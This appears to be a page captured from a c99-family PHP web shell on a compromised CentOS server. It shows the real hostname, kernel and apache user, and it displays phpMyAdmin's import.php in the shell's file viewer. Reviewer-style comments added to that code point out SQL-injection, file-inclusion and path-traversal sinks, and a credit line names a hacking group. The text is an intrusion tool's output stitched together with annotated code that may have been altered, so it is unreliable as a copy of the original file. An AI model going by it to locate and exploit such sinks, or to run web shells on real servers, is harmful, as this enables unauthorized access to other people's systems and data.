!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.16%)


Viewing file:     import.php (13.18 KB)      -rw-r--r--
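// NOTE(review): this listing starts mid-statement. The opening of the array
// literal below and the `if` that the "end store bookmarks" brace closes are
// outside the captured view, so the fragment is reproduced exactly as shown.
    $db,
    'user' => $cfg['Bookmark']['user'],
    'query' => urlencode($import_text),
    'label' => $bkm_label
    );

    // Should we replace bookmark?
    if (isset($bkm_replace)) {
        $bookmarks = PMA_listBookmarks($db, $cfg['Bookmark']);
        foreach ($bookmarks as $key => $val) {
            if ($val == $bkm_label) {
                PMA_deleteBookmarks($db, $cfg['Bookmark'], $key);
            }
        }
    }

    PMA_addBookmarks($bfields, $cfg['Bookmark'], isset($bkm_all_users));

    $bookmark_created = TRUE;
} // end store bookmarks

// We can not read all at once, otherwise we can run out of memory
$memory_limit = trim(@ini_get('memory_limit'));
// 2 MB as default
if (empty($memory_limit)) {
    $memory_limit = 2 * 1024 * 1024;
}
// In case no memory limit we work on 10MB chunks.
// Compare, do not assign: the previous `if ($memory_limit = -1)` was always
// true, so the 10 MB value replaced whatever limit was actually configured.
if ($memory_limit == -1) {
    $memory_limit = 10 * 1024 * 1024;
}

// Calculate value of the limit (php.ini shorthand: K, M or G suffix)
if (strtolower(substr($memory_limit, -1)) == 'm') {
    $memory_limit = (int)substr($memory_limit, 0, -1) * 1024 * 1024;
} elseif (strtolower(substr($memory_limit, -1)) == 'k') {
    $memory_limit = (int)substr($memory_limit, 0, -1) * 1024;
} elseif (strtolower(substr($memory_limit, -1)) == 'g') {
    $memory_limit = (int)substr($memory_limit, 0, -1) * 1024 * 1024 * 1024;
} else {
    $memory_limit = (int)$memory_limit;
}

// Just to be sure, there might be lot of memory needed for uncompression
$read_limit = $memory_limit / 4;

// handle filenames
if (!empty($local_import_file) && !empty($cfg['UploadDir'])) {
    // sanitize $local_import_file as it comes from a POST
    // NOTE(review): the path below is built by plain concatenation, so keeping
    // the import inside UploadDir rests entirely on PMA_securePath(), which is
    // defined outside this view -- confirm it rejects traversal sequences.
    $local_import_file = PMA_securePath($local_import_file);

    $import_file = PMA_userDir($cfg['UploadDir']) . $local_import_file;
} elseif (empty($import_file) || !is_uploaded_file($import_file)) {
    // Anything that is not a genuine HTTP upload is treated as "no file".
    $import_file = 'none';
}

// Do we have file to import?
if ($import_file != 'none' && !$error) {
    // work around open_basedir and other limitations
    $open_basedir = @ini_get('open_basedir');

    // If we are on a server with open_basedir, we must move the file
    // before opening it. The doc explains how to create the "./tmp"
    // directory
    if (!empty($open_basedir)) {
        $tmp_subdir = (PMA_IS_WINDOWS ? '.\\tmp\\' : './tmp/');

        // function is_writeable() is valid on PHP3 and 4
        if (is_writeable($tmp_subdir)) {
            // basename() keeps the destination inside $tmp_subdir.
            $import_file_new = $tmp_subdir . basename($import_file);
            if (move_uploaded_file($import_file, $import_file_new)) {
                $import_file = $import_file_new;
                // Remembered so the copy is removed in the cleanup step below.
                $file_to_unlink = $import_file_new;
            }
        }
    }

    // Handle file compression
    $compression = PMA_detectCompression($import_file);
    if ($compression === FALSE) {
        $message = $strFileCouldNotBeRead;
        $show_error_header = TRUE;
        $error = TRUE;
    } else {
        switch ($compression) {
            case 'application/bzip2':
                if ($cfg['BZipDump'] && @function_exists('bzopen')) {
                    $import_handle = @bzopen($import_file, 'r');
                } else {
                    $message = sprintf($strUnsupportedCompressionDetected, $compression);
                    $show_error_header = TRUE;
                    $error = TRUE;
                }
                break;
            case 'application/gzip':
                if ($cfg['GZipDump'] && @function_exists('gzopen')) {
                    $import_handle = @gzopen($import_file, 'r');
                } else {
                    $message = sprintf($strUnsupportedCompressionDetected, $compression);
                    $show_error_header = TRUE;
                    $error = TRUE;
                }
                break;
            case 'application/zip':
                if ($cfg['GZipDump'] && @function_exists('gzinflate')) {
                    include_once('./libraries/unzip.lib.php');
                    $import_handle = new SimpleUnzip();
                    $import_handle->ReadFile($import_file);
                    if ($import_handle->Count() == 0) {
                        $message = $strNoFilesFoundInZip;
                        $show_error_header = TRUE;
                        $error = TRUE;
                    } elseif ($import_handle->GetError(0) != 0) {
                        $message = $strErrorInZipFile . ' ' . $import_handle->GetErrorMsg(0);
                        $show_error_header = TRUE;
                        $error = TRUE;
                    } else {
                        // Only the first archive entry is used; it is held
                        // fully in memory as the import text.
                        $import_text = $import_handle->GetData(0);
                    }
                    // We don't need to store it further
                    $import_handle = '';
                } else {
                    $message = sprintf($strUnsupportedCompressionDetected, $compression);
                    $show_error_header = TRUE;
                    $error = TRUE;
                }
                break;
            case 'none':
                $import_handle = @fopen($import_file, 'r');
                break;
            default:
                $message = sprintf($strUnsupportedCompressionDetected, $compression);
                $show_error_header = TRUE;
                $error = TRUE;
                break;
        }
    }
    // The @-suppressed open calls above return FALSE on failure.
    if (!$error && $import_handle === FALSE) {
        $message = $strFileCouldNotBeRead;
        $show_error_header = TRUE;
        $error = TRUE;
    }
} elseif (!$error) {
    // No file: the import must come from pasted text. empty() already covers
    // the unset case, so no separate isset() is needed.
    if (empty($import_text)) {
        $message = $strNothingToImport;
        $show_error_header = TRUE;
        $error = TRUE;
    }
}

// Convert the file's charset if necessary
if ($cfg['AllowAnywhereRecoding'] && $allow_recoding && isset($charset_of_file)) {
    if ($charset_of_file != $charset) {
        $charset_conversion = TRUE;
    }
} elseif (PMA_MYSQL_INT_VERSION >= 40100 && isset($charset_of_file) && $charset_of_file != 'utf8') {
    // NOTE(review): $charset_of_file is concatenated into the statement without
    // escaping in this view; confirm it is checked against the list of known
    // charsets before this point, otherwise this is an SQL-injection sink.
    PMA_DBI_query('SET NAMES \'' . $charset_of_file . '\'');
    // We can not show query in this case, it is in different charset
    $sql_query_disabled = TRUE;
    $reset_charset = TRUE;
}

// Something to skip?
if (!$error && isset($skip)) {
    $original_skip = $skip;
    while ($skip > 0) {
        PMA_importGetNextChunk($skip < $read_limit ? $skip : $read_limit);
        $read_multiply = 1; // Disable read progresivity, otherwise we eat all memory!
        $skip -= $read_limit;
    }
    unset($skip);
}

if (!$error) {
    // Check for file existance
    // NOTE(review): $format becomes part of an include path here and in the
    // require below. Nothing in this view restricts it to a plugin name; if it
    // is request-controlled, confirm it is sanitised earlier in the file,
    // otherwise this is a local-file-inclusion sink.
    if (!file_exists('./libraries/import/' . $format . '.php')) {
        $error = TRUE;
        $message = $strCanNotLoadImportPlugins;
        $show_error_header = TRUE;
    } else {
        // Do the real import
        $plugin_param = $import_type;
        require('./libraries/import/' . $format . '.php');
    }
}

// Cleanup temporary file
if ($file_to_unlink != '') {
    unlink($file_to_unlink);
}

// Reset charset back, if we did some changes
if ($reset_charset) {
    PMA_DBI_query('SET CHARACTER SET utf8');
    // NOTE(review): $collation_connection is interpolated unescaped as well;
    // verify where it is assigned.
    PMA_DBI_query('SET SESSION collation_connection =\'' . $collation_connection . '\'');
}

// Show correct message
if (!empty($id_bookmark) && $action_bookmark == 2) {
    $message = $strBookmarkDeleted;
    $display_query = $import_text;
    $error = FALSE; // unset error marker, it was used just to skip processing
} elseif (!empty($id_bookmark) && $action_bookmark == 1) {
    $message = $strShowingBookmark;
} elseif ($bookmark_created) {
    // The label is user-supplied, hence the HTML escaping.
    $special_message = '[br]' . sprintf($strBookmarkCreated, htmlspecialchars($bkm_label));
} elseif ($finished && !$error) {
    if ($import_type == 'query') {
        $message = $strSuccess;
    } else {
        $message = sprintf($strImportSuccessfullyFinished, $executed_queries);
    }
}

// Did we hit timeout? Tell it user.
if ($timeout_passed) {
    $message = $strTimeoutPassed;
    if ($offset == 0 || (isset($original_skip) && $original_skip == $offset)) {
        $message .= ' ' . $strTimeoutNothingParsed;
    }
}

// Display back import page
require_once('./libraries/header.inc.php');

// There was an error?
if (isset($my_die)) {
    foreach ($my_die AS $key => $die) {
        PMA_mysqlDie($die['error'], $die['sql'], '', $err_url, $error);
        // NOTE(review): the literal below holds only a line break in this
        // capture; any markup it contained may have been stripped by the page.
        echo '
';
    }
}

if ($go_sql) {
    if (isset($_GET['pos'])) {
        // comes from the Refresh link
        // NOTE(review): taken from the query string unchanged; sql.php has to
        // treat $pos as untrusted input.
        $pos = $_GET['pos'];
    } else {
        // Set pos to zero to possibly append limit
        $pos = 0;
    }
    require('./sql.php');
} else {
    $active_page = $goto;
    // NOTE(review): $goto selects the script to include; confirm it is limited
    // to a whitelist of pages before this point.
    require('./' . $goto);
}
exit();
?>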


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]--